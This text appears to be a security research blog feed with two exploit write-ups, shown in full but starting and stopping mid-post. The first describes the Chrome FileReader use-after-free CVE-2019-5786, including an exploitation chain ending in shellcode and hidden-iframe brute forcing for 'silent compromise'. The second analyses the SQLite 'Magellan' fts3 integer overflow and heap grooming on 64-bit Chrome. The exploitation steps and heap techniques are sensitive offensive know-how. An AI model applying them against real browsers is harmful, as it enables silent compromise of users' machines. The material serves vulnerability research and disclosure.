4600000 24600000 20000000 MEM_PRIVATE MEM_RESERVE
24600000 24601000 1000 MEM_PRIVATE MEM_COMMIT PAGE_READWRITE [...............j]
24601000 24602000 1000 MEM_PRIVATE MEM_RESERVE
...
36681000 36690000 f000 MEM_PRIVATE MEM_RESERVE
36690000 65fc0000 2f930000 MEM_FREE PAGE_NOACCESS Free
65fc0000 65fc1000 1000 MEM_IMAGE MEM_COMMIT PAGE_READONLY Image [dbghelp; "C:\Windows\system32\dbghelp.dll"]
65fc1000 66085000 c4000 MEM_IMAGE MEM_COMMIT PAGE_EXECUTE_READ Image [dbghelp; "C:\Windows\system32\dbghelp.dll"]
66085000 66086000 1000 MEM_IMAGE MEM_COMMIT PAGE_READWRITE Image [dbghelp; "C:\Windows\system32\dbghelp.dll"]
...

Another important factor is the non-deterministic nature of the multiple garbage collectors that are involved in the managed heaps of Chrome. This introduces noise in the address space that is hard to control from JavaScript. Since the onprogress events used to trigger the vulnerability are also fired a non-deterministic number of times, and each event causes an allocation, the final location of the vulnerable ArrayBuffer is uncontrollable without the ability to trigger garbage collections on demand from JavaScript. The exploit uses the code shown below to invoke garbage collection. This makes it possible to free the results of onprogress events continuously, which helps in avoiding out-of-memory kills of the renderer process and also forces the dangling pointer created upon triggering the vulnerability to point to the lower end of the address space, somewhere into the beginning of the original 512MiB reserved region.

1
2
3
4
5
6
7
8
function force_gc() {
// forces a garbage collection to avoid OOM kills and help with heap non-determinism
try {
var failure = new WebAssembly.Memory({initial: 32767});
} catch(e) {
// console.log(e.message);
}
}

Exploitation steps

The exploit achieves code execution by the following steps:

  • Allocate a large (128MiB) string that will be used as the source of the Blob passed to FileReader. This allocation will end up in the free region following the bottom-up allocations (from 36690000 in the address space listing above).
  • Free the 512MiB reserved region via an oversized ArrayBuffer allocation, as discussed previously.
  • Invoke FileReader.readAsArrayBuffer. A number of onprogress event will be triggered, the last couple of which can return references to the same underlying ArrayBuffer if the timing of the events is right. This step can be repeated indefinitely until successful without crashing the process.
  • Free the backing store of the ArrayBuffer through one of the references. Going forward, another reference can be used to access the dangling pointer.
  • Reclaim the freed region by spraying the heap with recognizable JavaScript objects, interspersed with TypedArrays.
  • Look for the recognizable pattern through the dangling reference. This enables leaking the address of arbitrary objects by setting them as properties on the found object, then reading back the property value through the dangling pointer.
  • Corrupt the backing store of a sprayed TypedArray and use it to achieve arbitrary read write access to the address space.
  • Load a WebAssembly module. This maps a read-write-executable memory region of 64KiB into the address space.
  • Traverse the JSFunction object hierarchy of an exported function from the WebAssembly module using the arbitrary read/write primitive to find the address of the read-write-executable region.
  • Replace the code of the WebAssembly function with shellcode and execute it by invoking the function.

Increasing reliability

A single run of the exploit (which uses the steps detailed above) yields a success rate of about 25%, but using a trick you can turn that into effectively 100% reliability. Abusing the site isolation feature of Chrome enables brute-forcing, as described in another post on this blog by Ki Chan Ahn (look for the section titled “Making a Stealth Exploit by abusing Chrome’s Site Isolation”). A site corresponds to a (scheme:host) tuple, therefore hosting the brute forcing wrapper script on one site which loads the exploit repeatedly in an iframe from another host will cause new processes to be created for each exploit attempt. These iframes can be hidden from the user, resulting in a silent compromise. Using multiple sites to host the exploit code, the process can be parallelized (subject to memory and site-isolation process limits). The exploit developed uses a conservative timeout of 10 seconds for one iteration without parallelization and achieves code execution on average under half a minute.

The entire exploit code can be found on our github and it can be seen in action below.

Detection

The exploit doesn’t rely on any uncommon features or cause unusual behavior in the renderer process, which makes distinguishing between malicious and benign code difficult without false positive results.

Mitigation

Disabling JavaScript execution via the Settings / Advanced settings / Privacy and security / Content settings menu provides effective mitigation against the vulnerability.

Conclusion

It’s interesting to see exploits in the wild still targeting older platforms like Windows 7 x86. The 32-bit address space is so crowded that additional randomization is disabled in PartitionAlloc and win32k lockdown is only available starting Windows 8. Therefore, the lack of mitigations on Windows 7 that are present in later versions of Windows make it a relatively soft target for exploitation.

Subscribers of our N-Day feed can leverage our in-depth analysis of critical vulnerabilities to defend themselves better, or use the provided exploits during internal penetration tests.

The post CVE-2019-5786: Analysis & Exploitation of the recently patched Chrome vulnerability appeared first on Exodus Intelligence.

Exploiting the Magellan bug on 64-bit Chrome Desktop

23 January 2019 at 05:59

Author: Ki Chan Ahn

In December 2018, the Tencent Blade Team released an advisory for a bug they named “Magellan”, which affected all applications using sqlite versions prior to 2.5.3. In their public disclosure they state that they successfully exploited Google Home using this vulnerability. Despite several weeks having passed after the initial advisory, no public exploit was released. We were curious about how exploitable the bug was and whether it could be exploited on 64-bit desktop platforms. Therefore, we set out to create an exploit targeting Chrome on 64-bit Ubuntu.

Background

The Magellan bug is a bug in the sqlite database library. The bug lies in the fts3(Full Text Search) extension of sqlite, which was added in 2007. Chrome started to support the WebSQL standard (which is now deprecated) in 2010, so all versions between 2010 and the patched version should be vulnerable. The bug triggers when running a specific sequence of SQL queries, so only applications that can execute arbitrary SQL queries are vulnerable.

A short glance at the Vulnerability

In order to exploit a bug, the vulnerability has to be studied in detail. The bug was patched in commit 940f2adc8541a838. By looking at the commit, there were actually 3 bugs. We will look at the patch in the “fts3SegReaderNext” function, which was the bug that was actually used during exploitation. The other two bugs are very similar in nature, with the other bugs being slightly more complicated to trigger.
The gist of the patch is summarized below, with the bottom snippet being the patched version.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
static int fts3SegReaderNext(
  Fts3Table *p,
  Fts3SegReader *pReader,
  int bIncr
){
  int rc;                         /* Return code of various sub-routines */
  char *pNext;                    /* Cursor variable */
  int nPrefix;                    /* Number of bytes in term prefix */
  int nSuffix;                    /* Number of bytes in term suffix */

  // snipped for brevity

  pNext += fts3GetVarint32(pNext, &nPrefix);
  pNext += fts3GetVarint32(pNext, &nSuffix);
  if( nPrefix<0 || nSuffix<=0
   || &pNext[nSuffix]>&pReader->aNode[pReader->nNode]
  ){
    return FTS_CORRUPT_VTAB;
  }

  if( nPrefix+nSuffix>pReader->nTermAlloc ){
    int nNew = (nPrefix+nSuffix)*2;
    char *zNew = sqlite3_realloc(pReader->zTerm, nNew);
    if( !zNew ){
      return SQLITE_NOMEM;
    }
    pReader->zTerm = zNew;
    pReader->nTermAlloc = nNew;
  }

  rc = fts3SegReaderRequire(pReader, pNext, nSuffix+FTS3_VARINT_MAX);
  if( rc!=SQLITE_OK ) return rc;

  memcpy(&pReader->zTerm[nPrefix], pNext, nSuffix);
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
static int fts3SegReaderNext(
  Fts3Table *p,
  Fts3SegReader *pReader,
  int bIncr
){
  int rc;                         /* Return code of various sub-routines */
  char *pNext;                    /* Cursor variable */
  int nPrefix;                    /* Number of bytes in term prefix */
  int nSuffix;                    /* Number of bytes in term suffix */

  // snipped for brevity

  pNext += fts3GetVarint32(pNext, &nPrefix);
  pNext += fts3GetVarint32(pNext, &nSuffix);
  if( nSuffix<=0
   || (&pReader->aNode[pReader->nNode] - pNext)<nSuffix
   || nPrefix>pReader->nTermAlloc
  ){
    return FTS_CORRUPT_VTAB;
  }

  /* Both nPrefix and nSuffix were read by fts3GetVarint32() and so are
  ** between 0 and 0x7FFFFFFF. But the sum of the two may cause integer
  ** overflow - hence the (i64) casts.  */

  if( (i64)nPrefix+nSuffix>(i64)pReader->nTermAlloc ){
    i64 nNew = ((i64)nPrefix+nSuffix)*2;
    char *zNew = sqlite3_realloc64(pReader->zTerm, nNew);
    if( !zNew ){
      return SQLITE_NOMEM;
    }
    pReader->zTerm = zNew;
    pReader->nTermAlloc = nNew;
  }

  rc = fts3SegReaderRequire(pReader, pNext, nSuffix+FTS3_VARINT_MAX);
  if( rc!=SQLITE_OK ) return rc;

  memcpy(&pReader->zTerm[nPrefix], pNext, nSuffix);

The patched version explicitly casts nPrefix and nSuffix to i64, because both nPrefix and nSuffix is declared as int, and the check on the highlighted line can be bypassed if the addition of the two values overflow. By explicitly casting, the check will be correctly assessed, and the allocation size on the following line will also be correctly calculated. This new allocation will be placed in pReader->zTerm, and will further be used in line 38 for a memcpy operation.
Now going back to the version before the patch, there is no explicit casting as seen on line 21, and therefore, if the addition of the two values are larger than 2^31, the result will be negative and the inner code block will not be executed. What this means is that the code does not allocate a new block that is big enough for the memcpy operation below. This has several implications. But to fully understand what the bug gives to us, it is necessary to understand some core concepts of sqlite.

SQLite Internals

SQLite is a C-language library that implements a small, fast, self-contained SQL database engine, that claims to be the most used database engine in the world. SQLite implements most of the core sql features, as well as some features unique in SQLite. This blog post will not go in every detail of the database engine, but more like brush on the concepts that are relevant to the exploit.

SQLite Architecture

This is a summary of the Architecture of SQLite page on the official sqlite homepage. The SQLite is a small virtual machine that emits bytecode that later gets executed by the engine, just like an interpreter would do in a javascript engine. As such, it consists of a Tokenizer, Parser, Code Generator, and a Bytecode Engine. All of the SQL queries that are to be executed have to go through this pipeline. What this means in an exploiter’s point of view is that if the bug occurs in the Bytecode Engine phase, then there will be massive heap noise coming from the previous 3 stages, and the exploiter has to deal with them during Heap Feng-shui.

Another notable thing about SQLite is the use of B-Trees. SQLite uses B-Tree data structures to implement efficient, and fast searches on the values in the database. One thing to keep in mind is that the actual data of B-Trees is kept on disk, and not in memory. This is a logical decision because some databases could get very large, and keeping all the data in memory would induce a large memory overhead. However, performing every search of a query on-disk would introduce a huge disk IO overhead, and hence, SQLite uses something called a Page Cache. This Page Cache is responsible of placing recently queried database data pages onto memory, so that it could re-use them if another query searches for data on the same set of pages. The SQLite engine manages which pages should be mapped into memory and mapped out, so disk and memory overhead is well balanced. This gives another meaning to an exploiter’s point of view. Most objects that are created during a single query execution is destroyed after the Bytecode Engine is done with the query, and the only thing that remains in-memory is the data in the Page Cache. This means the actual data values that are living in the database tables are not a good target for Heap Feng-Shui, because most of the objects that represent the table data will be thrown away immediately after query execution. In addition, the actual table data will only lie somewhere in the middle of the Page Cache, which are just slabs of multiple pages that hold parts of the database file saved on the disk.

Full Text Search extensions

A brief introduction

The SQLite homepage describes Full-Text Search as the following.

FTS3 and FTS4 are SQLite virtual table modules that allows users to perform full-text searches on a set of documents. The most common (and effective) way to describe full-text searches is “what Google, Yahoo, and Bing do with documents placed on the World Wide Web”. Users input a term, or series of terms, perhaps connected by a binary operator or grouped together into a phrase, and the full-text query system finds the set of documents that best matches those terms considering the operators and groupings the user has specified.

Basically, the Full-Text Search (FTS) is an extension on SQLite, that enables it to query for search terms Google-style in an efficient way. The architecture and internals of the Full-Text Search engine is thoroughly described on the respective webpage. SQLite continuously upgraded their FTS engine, from fts1 to fts5. The vulnerability occurs on the 3rd version of the extension, fts3. This specific version is also the only version that is allowed to be used in Chrome. All requests to use the other 4 versions is rejected by Chrome. Therefore, it is important to understand some main concepts behind fts3.

Here is small example of how to issue an fts3 query.

CREATE VIRTUAL TABLE mail USING fts3(subject, body);

INSERT INTO mail(subject, body) VALUES('sample subject1', 'sample content');
INSERT INTO mail(subject, body) VALUES('sample subject2', 'hello world');

SELECT * FROM mail WHERE body MATCH 'sample';

This will create an fts table that uses the Full-Text Search version 3 extension, and insert the content into their respective tables. In the above query, only one table mail is created, but under the hood there are 5 more tables created. Some of these tables will be discussed in detail in the following sections. During the INSERT statement, the VALUEs will be split into tokens and all tokens will have an index associated with it and inserted into their respective tables. During the SELECT statement, the search keyword(in the above example ‘sample’) will be looked up in the indexed token tables and if the keyword is matched, then the corresponding rows in the mail table will be returned. This was a brief summary of how the full text search works under the hood. Now it is time to dig in a little deeper into the elements that are related to the exploit.

Shadow Tables

In SQLite, there is something called Shadow Tables, which are basically just regular tables that exist to support the Virtual Table operations. These tables are created under the hood when issuing the CREATE VIRTUAL TABLE statement, and they store either the user INSERT’d data, or supplementary data that’s automatically inserted by the Virtual Table implementation. Since they are basically just regular tables, the content is accessible and modifiable just like any other table. An example of how the shadow tables are created is shown below.

sqlite> CREATE VIRTUAL TABLE mail USING fts3(subject, body);
sqlite> INSERT INTO mail(subject, body) VALUES('sample subject1', 'sample content');
sqlite> INSERT INTO mail(subject, body) VALUES('sample subject2', 'hello world');
sqlite> SELECT name FROM sqlite_master WHERE TYPE='table';
mail
mail_content
mail_segments
mail_segdir

For instance, when a user issues an INSERT/UPDATE/DELETE statement on an fts3 table, the virtual table implementation modifies the rows in the underlying shadow tables, and not the original table mail that was created during the CREATE VIRTUAL TABLE statement. The reason why this is so is because when the user issues an INSERT statement, the entire content of the value has to be split into tokens, and all those tokens and indexes need to be stored individually, not by the query issued by the user but by the c code implementation of fts3. These tokens and indexes won’t be stored as is, but stored in a custom format defined by fts3 in order to pack all the values as compact as possible. In the fts3 case, the token (or term) and the index will be stored inside the tablename_segments and tablename_segdir shadow table with tablename being replaced with the actual table name that the user specified during the CREATE VIRTUAL TABLE statement. The entire sentence before it was split (sample subject, sample content in the above query) is going to be stored in the tablename_content shadow table. The remaining two shadow tables are tablename_stat and tablename_docsize which are support tables related to statistics, and the total count of index and terms. These two tables are only created when using the fts4 extension. The most important table in this article is the tablename_segdir table, which will be used to trigger the vulnerability later on.

Variable Length Format

In the fts3 virtual table module, the shadow tables store data as SQLite supported data types, or otherwise they are all joined into one giant chunk of data and stored in a compact form as a BLOB. One such example is the table below.

CREATE TABLE %_segdir(
  level INTEGER,
  idx INTEGER,
  start_block INTEGER,               -- Blockid of first node in %_segments
  leaves_end_block INTEGER,          -- Blockid of last leaf node in %_segments
  end_block INTEGER,                 -- Blockid of last node in %_segments
  root BLOB,                         -- B-tree root node
  PRIMARY KEY(level, idx)
);

Some values are stored as INTEGER values, but the root column is stored as a BLOB. As mentioned before, the values are stored in a compact format in order to save space. STRING values are stored as-is, with a length value preceding it. But then, how is the length value stored? SQLite uses a format which they term as fts Variable Length Format. How the algorithm works is as follows.

  1. Represent the integer value into bits.
  2. Split the integer value every 7 bits.
  3. Take the current lowest 7 bits. If it is not the last(most significant) 7 bits, then add 1 to the most significant bit to form a full 8 bit value.
  4. Repeat step 3 for all of the following 7bit values.
  5. If it’s the last(most significant) 7bits, then add a 0 to the most significant bit to form a full 8 bit value.
  6. Append all of the bytes that were created on step 3 and step 5 to create one long byte string, and that is the resulting Variable Length Integer.

Why SQLite uses this format is because it wants to use the exact amount of bytes needed to store the integer. It doesn’t want to pad additional 0’s that take up extra space, if the integer were to be saved in a fixed width format such as the standard c types. This format is something to keep in mind when constructing the payload in a later phase of exploitation.

Segment B-Tree Format

The Segment B-Tree is a B-Tree that is tailored to serve for the fts extension’s needs. Since it is a complex format, only the elements related to the vulnerability will be discussed.

These are the fields in the tablename_segdir table. It stores most of the token and index data, and the most important field is the root member. We will focus on this member in detail.
The B-Tree consists of tree nodes and node data. A node can be an interior node, or a leaf. For simplicity’s sake, we will assume that the B-Tree has only a single node, and that node is the root node as well as a leaf node. The format of a leaf node is as follows.

Here is a quote borrowed from the SQLite webpage.

The first term stored on each node (“Term 1” in the figure above) is stored verbatim. Each subsequent term is prefix-compressed with respect to its predecessor. Terms are stored within a page in sorted (memcmp) order.

To give an example, in accordance to the above picture, let’s say Term 1 is apple. The Length of Term 1 is 5, and the content of Term 1 is apple. Doclist 1 follows the format of a Doclist which is described here. They are essentially just an array of VarInt values, but they are not important for the discussion of the exploit and hence, will be skipped. Let’s say Term 2 is april. the Prefix Length of Term 2 will be 2. The Suffix Length of Term 2 will be, let’s say, 3. The Suffix Content of Term 2 is ril. As a last example, Term3’s Prefix Length, Suffix Length, and Suffix Content will be 5, 3, and pie respectively. This describes the term applepie. This might seem a little messy in text, so the following is an illustration of the entire BLOB that was just described.

This is what gets saved into root column of tablename_segdir when the user INSERTs “apple april applepie” into the fts table. As more content is inserted, the tree will grow interior nodes and more leaves, and the BLOB data of the entire tree will be stored in the tablename_segdir and tablename_segment shadow tables. This may not be entirely accurate, but this is basically what the indexing engine does, and how the engine stores all the search keywords and looks them up in a fast and efficient way. It should be noted that all the Length values within this leaf node is stored in a fts VarInt(Variable Length integer) format described above.

Revisiting the Bug

Now that the foundation has been laid out it is time to revisit the bug to get a better understanding of it, and what (initial) primitives the bug provides us. But before we dig into the bug itself, let’s discuss something about shadow tables, and how SQLite treated them before they were hardened in version 3.26.0.
As mentioned above, shadow tables are (were) essentially just normal tables with no access control mechanism on those special tables. As such, anyone that can execute arbitrary SQLite statements can read, modify shadow tables without any restrictions. This can become an issue when the virtual table implementation c code reads content from the shadow tables, and parses it. This is exactly what the bug relies on. The bug requires a value in one of the shadow tables to be set to a specific value, in order to trigger the bug.
After the Magellan bug was reported to SQLite, the developers of SQLite deemed that the ability to modify shadow tables was too powerful, and as a response decided to add a mitigation to it. This is the SQLITE_DBCONFIG_DEFENSIVE flag added in version 3.26.0. The actual bugs were fixed in 3.25.3, but the advisory recommends to upgrade to 3.26.0 in case any other bug is lurking in the code, so that exploitation of the potential bug can be blocked with the flag. Turning on this flag will make the shadow tables read-only to user executed SQL queries, and makes it impossible for malicious SQL queries to modify data within the shadow tables (This is not entirely true because there are lots of places where sql queries are dynamically created by the engine code itself, such as this function. SQL queries executed by the SQLite engine itself are immune to the SQLITE_DBCONFIG_DEFENSIVE flag, so some of these dynamic queries which are constructed based on values supplied by the attacker’s SQL query are potential bypass targets. These attacker controlled values can include spaces and special characters without any issues when the entire value is surrounded by quotes, so it makes it as a possible SQL injection attack vector. Still, the SQLITE_DBCONFIG_DEFENSIVE flag serves as a good front line defense).

Now, back to the bug.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
static int fts3SegReaderNext(
  Fts3Table *p,
  Fts3SegReader *pReader,
  int bIncr
){
  int rc;                         /* Return code of various sub-routines */
  char *pNext;                    /* Cursor variable */
  int nPrefix;                    /* Number of bytes in term prefix */
  int nSuffix;                    /* Number of bytes in term suffix */

  // snipped for brevity

  pNext += fts3GetVarint32(pNext, &nPrefix);
  pNext += fts3GetVarint32(pNext, &nSuffix);
  if( nPrefix<0 || nSuffix<=0
   || &pNext[nSuffix]>&pReader->aNode[pReader->nNode]
  ){
    return FTS_CORRUPT_VTAB;
  }

  if( nPrefix+nSuffix>pReader->nTermAlloc ){
    int nNew = (nPrefix+nSuffix)*2;
    char *zNew = sqlite3_realloc(pReader->zTerm, nNew);
    if( !zNew ){
      return SQLITE_NOMEM;
    }
    pReader->zTerm = zNew;
    pReader->nTermAlloc = nNew;
  }

  rc = fts3SegReaderRequire(pReader, pNext, nSuffix+FTS3_VARINT_MAX);
  if( rc!=SQLITE_OK ) return rc;

  memcpy(&pReader->zTerm[nPrefix], pNext, nSuffix);
  pReader->nTerm = nPrefix+nSuffix;
  pNext += nSuffix;
  pNext += fts3GetVarint32(pNext, &pReader->nDoclist);

To understand the code, the meaning of some variables should be explained. The fts3SegReaderNext function reads data from the fts3 B-Tree nodes, and traverses through each Term stored in a single node, and builds a full term based on the Term 1 string, and the Prefix and Suffix data for the rest of the Terms. pReader will hold the information of the current Term being built. The pNext variable points to the BLOB data of the tablename_segdir->root column. We will assume that the BLOB contains data that represents a leaf node, and contains exactly 2 Terms. pNext will continuously advance forward as data is read in by the program code. The function ftsGetVarint32 reads in an fts VarInt from the data pNext points to, and stores it into a 32-bit variable. pReader->zTerm will contain malloc’d space that is big enough to hold the term that was built on each iteration.

Now let’s assume that the tablename_segdir->root contains BLOB data such as follows.

The range of Term 1 was expanded to include the leftmost byte, which is a fixed value of 0 but internally represents the Prefix Length of Term 1. In this layout, fts3SegReaderNext would be called 2 times. In the first call, it would allocate a 0x10 sized space for the string apple on line 23 of the previous code listing, and actually copy in the value on line 34. On the second call, it would add the length of the prefix and suffix, and check if it exceeds 5*2 on line 21. Since it doesn’t, it reuses the space created on the first call, and builds a complete term by copying in the prefix and the suffix on line 34. This is done for all terms stored within the current node, but in the above case, it is only called twice. Now consider the following case.

Everything is the same with Term 1. A 0x10 space is allocated and apple is stored. However, on the second iteration, nPrefix is read from the blob as 0x7FFFFFFF, and nSuffix as 1. On line 21, nPrefix + nSuffix is 0x80000000 which is negative, thus bypassing the check which is operated on signed integers, and no allocation is performed. On line 34, The memcpy will operate with the source being &pReader->zTerm[0x7FFFFFFF]. As a note, the reason why the example value of nPrefix is set to 0x7FFFFFFF instead of 0xFFFFFFFF is because the function that actually reads the value, which is fts3GetVarint32, only reads up to a maximum value of 0x7FFFFFFF and any value above that is truncated.

Let’s first assess the meaning of this on a 32-bit platform. pReader->zTerm points to the beginning of apple, so &pReader->zTerm[0x7FFFFFFF] will point to 2 gigabytes after apple, and memcpy will copy 1 byte of the suffix “a” to that location. This is effectively an OOB write to data that is placed 2GB’s after Term 1‘s string. On a 32-bit platform, there is a possibility where &pReader->zTerm[0x7FFFFFFF] actually wraps around the address space and points to an address before apple. This could be used to our advantage, if it is possible to place interesting objects at the wrapped around address.
Now let’s see what elements of the OOB write is controllable. Since the attacker can freely modify the shadow table data, the entire content of the BLOB is controllable. This means that the string of Term 1 is controllable, and in turn, the allocation size of pReader->zTerm is controllable. The offset 0x7FFFFFFF of &pReader->zTerm[0x7FFFFFFF] is also controllable, provided that it is lower than 0x7FFFFFFF. Next, since the Suffix Length of Term 2 is attacker controlled, the memcpy size is also controlled. Finally, the actual data that is copied from the source of the memcpy comes from pNext, which points to Term 2‘s string data, so that is controlled too. This gives a restrictive, but powerful primitive of an OOB write, where the destination chunk size, memcpy source data content, and size is completely attacker controlled. The only requirement is that the target to be corrupted has to be placed 2GB’s after the destination chunk which is apple in the example.

The situation in a 64-bit environment is not very different from 32-bit. Everything is the same, except that &pReader->zTerm[0x7FFFFFFF] has no chance to wrap around the address space because the 64-bit address space is too big for that to happen. Also, in 32-bit, spraying the heap to cover the entire address space is a useful tool that can be used to aid exploitation, but it is not suitable to do so in 64-bit.

Now let’s talk about the restriction of the bug. Because the added values of nPrefix+nSuffix has to be bigger than 0x80000000 in order to pass the check on line 21, only certain nPrefix and nSuffix value pairs can be used to trigger the bug. For instance, a [0x7FFFFFFF, 1] pair is okay. [0x7FFFFFFE, 2], [0x7FFFFFFD, 3], [1, 0x7FFFFFFF], [2, 0x7FFFFFFE] is also okay. But [0x7FFFFFF0, 1] is not okay and will not pass the check and fall into the if block. If it falls into the if block, then a very large allocation will happen and the function will most likely return with SQLITE_NOMEM. Therefore, based on the values that are accepted by the bug, we can OOB write data in the following ranges.

Basically, the overwritten data must include the byte that is exactly 0x7FFFFFFF bytes away from the memcpy destination, and it could overwrite data either backwards or forward, with attacker controlled data of any size. This is the positional restriction of the bug. The OOB write cannot start at an arbitrary offset. After assessing the primitives given by the bug, we came to the conclusion that the bug could very well be exploitable on 64-bit platforms, provided that there is a good target for corruption, where the target object has certain tolerance for marginal errors. The next sections will describe the entire process of exploitation, including which targets were picked for corruption, and how they were abused for information leak and code execution.

Exploitation

Before diving in, it should be noted that the exploit was not designed to be 100% reliable. There are some sources of failure and some of them were addressed, but the ones that were too time consuming to fix were just left as is. The exploit was built as means to show that the bug is exploitable on Desktop platforms, and as such, the focus was placed on pushing through to achieve code execution, not maximizing reliability and speed. Nevertheless, we will discuss potential pitfalls and sources of failure on each stage of exploitation, and suggest possible solutions to address them.

The exploit is divided into 11 stages. The reason for dividing is because all SQL queries can not be stuffed into one huge transaction, because certain queries had to be split in order to achieve reliable corruption. Furthermore, a lot of SQL queries were dependent on previous queries, such as the infoleak phase, so the previous query results had to be parsed from javascript and passed on to the next batch of SQL queries. Each of the 11 stages will be described in detail, from the meaning of the cryptic queries, to the actual goal that the stage is trying to achieve.

The TCMalloc allocator

Before even attempting to build an exploit, it is essential to understand the allocator in play. The application that links the sqlite library would most likely use the system allocator that lies underneath, but in the situation of Chrome, things are a little different. According to the heap design documents of Chrome, Chrome hooks all calls to malloc and related calls, and redirects them to other custom allocators. This is different for every operating system, so it is important to understand which allocator Chrome chooses to use instead of the system allocators. In the case of Linux, Chrome redirects every malloc operation to TCMalloc. TCMalloc is an allocator developed and maintained by Google, with certain security properties kept in mind during development, as well as being a fast and efficient allocator.

The TCMalloc works very similar to allocators such as jemalloc, or the LFH, which splits a couple pages into equal sized chunks, and groups each different-sized chunks into seperate freelists. The way they are linked are kind of like PTMalloc’s fastbins, in that they are linked in a singly-linked list. The way they split a page into equal sized chunks kind of resembles that of jemalloc. However, unlike the LFH, there is no randomness element added in to the freelists, which makes the job easier. There are 2 (more specifically, 3) size categories of TCMalloc. In Chrome, chunks that have sizes lower than 0x8000 are categorized as small chunks, where sizes bigger are large chunks. The small chunks are further divided into 54 size classes (this value is specific to Chrome), and each chunks are grouped/managed by their respective size class. The free chunks are linked by singly-linked list as described above. In TCMalloc, there is something called a per-thread cache, and a central page cache. The threads each have their own freelists to manage their pool of small chunks. If the free-list of a certain chunk size reaches a certain threshold (this threshold is dynamic and changes to adapt to the heap usage), then the per-thread cache can toss a chunk of that chunk size’s freelist to the central cache. Or, if the combined size of all free chunks on all size classes of the thread cache reaches a threshold (4MB on Chrome), then the garbage collector kicks in and collects chunks from all freelists on the thread cache and gives them to the central cache. The central cache is the manager for all thread cachces. It issues new freelists if a thread cache’s freelists is exhausted, or it collects chunks of freelists if a thread cache’s freelist grows too big. The central cache is also the manager for large chunks. All chunk sizes larger than 0x8000 request chunks from the central cache, and the central cache manages the freelist of large chunks either by a singly-linked list, or a red-black tree.

All of this might seem too convoluted on text. Here are some illustrations borrowed from Sean Heelan’s excellent slides from 2011 InfiltrateCon.

An overview of the Thread Cache and the Central Page Cache

How the Central Cache conjures a new freelist

Singly-linked list of each size class of small chunks

The algorithm of tc_malloc(small_chunk_size)

Also, the following links are very helpful to get a general overview of how the TCMalloc allocator works.

Attacking the WebKit Heap
TCMalloc : Thread-Caching Malloc
How tcmalloc Works

And of course, the best reference is the source code itself.

Stage 1 and Stage 2

Now that the basics of the allocator have been touched, it’s time to find the right object to corrupt. One of the first targets that comes to mind is the Javascript objects on the v8 heap. This was the first target that we went for, because corrupting the right javascript object would instantly yield relative R/W, which can further be upgraded to an AAR/AAW. However, due to the way PartitionMalloc requests pages from the underlying system allocator, it was impossible to have the v8 heap placed behind TCMalloc’s heap. Even if it happened, chances were near zero.

Therefore, we decided to go for objects that are bound to be on the same heap. That is, objects that are allocated by SQLite itself. As mentioned in the SQLite Architecture section, the actual data value of the tables are not good targets to manipulate the heap. The B-Tree that represents the data also live on the Page Cache or the database file on disk. Even if parts of the B-Tree is briefly constructed in-memory upon a SELECT statement, it’s going to be immediately purged as soon as the Bytecode engine is done executing the SELECT statement. There would seem a very limited choice for objects that could influence the heap in a controlled fashion, if the table data values can not be used. However, there is one more object that could make a good candidate.

That is, Table and Column objects. It just so happens that SQLite decided to keep all Table and Column objects that were created by a CREATE statement in memory, and those objects persists until the database is closed completely. The decision behind this would be based on the assumption that Table and Column objects would not be too over-bloated, or at least the developers thought that such case would be rare enough, that the performance advantage of keeping those objects in memory would outweigh the memory costs of those objects. This is true to some degree. However, in practice, it is theoretically possible to construct Column Objects that could eat a colossal amount of memory while persisting in memory. This can be observed in the Limits In SQLite webpage.

The maximum number of bytes in the text of an SQL statement is limited to SQLITE_MAX_SQL_LENGTH which defaults to 1000000. You can redefine this limit to be as large as the smaller of SQLITE_MAX_LENGTH and 1073741824.

One thing to notice is that SQLite does not have an explicit limit on the length of a column name, or a table name. Both of them are just governed by the length of the SQL statement that contains those names, which is SQLITE_MAX_LENGTH. So as long as the length of the user query is lower than SQLITE_MAX_LENGTH, SQLite would happily accept column names of any size. Although SQLite itself defaults SQLITE_MAX_SQL_LENGTH to 1000000, Chrome redefines this value as 1000000000.

1
2
3
4
5
6
7
8
9
10
/*
** The maximum length of a single SQL statement in bytes.
**
** It used to be the case that setting this value to zero would
** turn the limit off.  That is no longer true.  It is not possible
** to turn this limit off.
*/
#ifndef SQLITE_MAX_SQL_LENGTH
# define SQLITE_MAX_SQL_LENGTH 1000000000
#endif

1000000000 is a very big value. It is almost 1GB. What this means is that theoretically, it is possible to create column names that are approximately 1GB, and make them persist in memory. Before discussing what we’re going to do with the Column values, let’s look at the structures of the objects involved on column name creation, and the code that handles them.

When a table is created by the CREATE statement, the tokenizer would tokenize the entire SQL query, and pass the tokens to the parser. Under the hood, SQLite uses the Lemon Parser Generator. Lemon is similar to the more popular YACC or BISON parsers, but has a different grammar and is maintained by SQLite. The Lemon parser generator will parse context-free code that is written in Lemon grammar syntax, and generates an LALR parser in C code. In SQLite, the bulk of the generated C code can be found in the yy_reduce function. The actual context-free code that Lemon parses is found in parse.y, and the code that is used for CREATE statements is found here. A snippet of the code is shown below.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
///////////////////// The CREATE TABLE statement ////////////////////////////
//
cmd ::= create_table create_table_args.
create_table ::= createkw temp(T) TABLE ifnotexists(E) nm(Y) dbnm(Z). {
   sqlite3StartTable(pParse,&Y,&Z,T,0,0,E);
}
createkw(A) ::= CREATE(A).  {disableLookaside(pParse);}

%type ifnotexists {int}
ifnotexists(A) ::= .              {A = 0;}
ifnotexists(A) ::= IF NOT EXISTS. {A = 1;}
%type temp {int}
%ifndef SQLITE_OMIT_TEMPDB
temp(A) ::= TEMP.  {A = 1;}
%endif  SQLITE_OMIT_TEMPDB
temp(A) ::= .      {A = 0;}
create_table_args ::= LP columnlist conslist_opt(X) RP(E) table_options(F). {
  sqlite3EndTable(pParse,&X,&E,F,0);
}
create_table_args ::= AS select(S). {
  sqlite3EndTable(pParse,0,0,0,S);
  sqlite3SelectDelete(pParse->db, S);
}
%type table_options {int}
table_options(A) ::= .    {A = 0;}
table_options(A) ::= WITHOUT nm(X). {
  if( X.n==5 && sqlite3_strnicmp(X.z,"rowid",5)==0 ){
